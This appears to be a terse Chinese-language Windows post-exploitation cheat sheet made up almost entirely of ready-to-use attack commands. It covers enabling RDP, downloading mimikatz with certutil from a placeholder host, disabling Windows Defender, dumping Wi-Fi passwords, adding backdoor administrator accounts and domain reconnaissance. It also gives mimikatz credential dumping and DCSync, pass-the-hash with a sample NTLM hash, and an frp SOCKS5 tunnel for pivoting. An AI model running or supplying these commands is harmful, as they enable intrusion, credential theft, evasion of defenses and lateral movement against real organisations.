开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看远程桌面端口:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

锁屏:

rundll32.exe user32.dll,LockWorkStation

远程下载:

certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe
certutil.exe && certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe    //bypass

关闭defender:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD

读取wifi密码:

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

远程桌面保存凭据:

cmdkey /list

添加用户:

net user name password /add
net localgroup administrators name /add
net user name /delete

域内信息收集:

net user /domain //获取域用户列表
net group /domain  //查询域内所有用户组列表
net group “Domain Admins” /domain //查询域管理员用户
net group "Domain Controllers" /domain  //查看域控制器
net localgroup administrators /domain  //查询域内置本地管理员组用户

dir /s /a \\域控\sysvol\*.xml

mimikatz:

privilege::debug
sekurlsa::logonpassword(s)
lsadump::dcsync /domain:test.com /all /csv

pth:

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

sekurlsa::pth /user:administrator /domain:xxx /ntlm:xxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"    //desktop

frp:

[common]
server_addr = xxx
server_port = xxx
token = xxx

[plugin_socks5]
type = tcp
remote_port = xxxx
plugin = socks5
plugin_user = xxx
plugin_passwd = xx

目录